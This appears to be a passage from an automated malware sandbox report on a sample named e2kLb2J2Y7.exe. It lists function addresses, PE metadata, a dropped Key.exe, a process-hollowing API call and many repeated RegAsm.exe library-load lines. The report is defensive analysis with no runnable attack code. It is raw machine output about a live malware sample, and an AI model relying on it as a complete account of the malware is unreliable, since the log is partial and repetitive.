Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DD0C0 22_2_00000001401DD0C0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DD4E0 22_2_00000001401DD4E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DC4C3 22_2_00000001401DC4C3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DDD60 22_2_00000001401DDD60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DE960 22_2_00000001401DE960
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401D8957 22_2_00000001401D8957
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DA946 22_2_00000001401DA946
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DA562 22_2_00000001401DA562
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401E01F0 22_2_00000001401E01F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401D9EAA 22_2_00000001401D9EAA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401D878E 22_2_00000001401D878E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401E93C0 22_2_00000001401E93C0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401DC3D9 22_2_00000001401DC3D9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014034185F 22_2_000000014034185F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140343A30 22_2_0000000140343A30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014033BA30 22_2_000000014033BA30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014032C020 22_2_000000014032C020
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140331800 22_2_0000000140331800
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014034189B 22_2_000000014034189B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014034187F 22_2_000000014034187F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001403420F0 22_2_00000001403420F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001403414F0 22_2_00000001403414F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014032B980 22_2_000000014032B980
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140330650 22_2_0000000140330650
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_000000014032F240 22_2_000000014032F240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140343780 22_2_0000000140343780
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140164D50 22_2_0000000140164D50
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140143550 22_2_0000000140143550
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140164F70 22_2_0000000140164F70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_0000000140165190 22_2_0000000140165190
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401653B0 22_2_00000001401653B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401D3000 22_2_00000001401D3000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Code function: 22_2_00000001401D4CA0 22_2_00000001401D4CA0
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Code function: 4_2_00007FFD34A31A51 NtUnmapViewOfSection, 4_2_00007FFD34A31A51
Source: e2kLb2J2Y7.exe Static PE information: No import functions for PE file found
Source: Key.exe.0.dr Static PE information: No import functions for PE file found
Source: e2kLb2J2Y7.exe, 00000000.00000002.2113076611.0000000003A81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVchwz.dll" vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2112901867.00000000034C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameVchwz.dll" vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.000000001411F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013D32000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameVchwz.dll" vs e2kLb2J2Y7.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2119559913.000000001D5D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs e2kLb2J2Y7.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxx.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: nvapi64.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe Section loaded: atiadlxy.dll
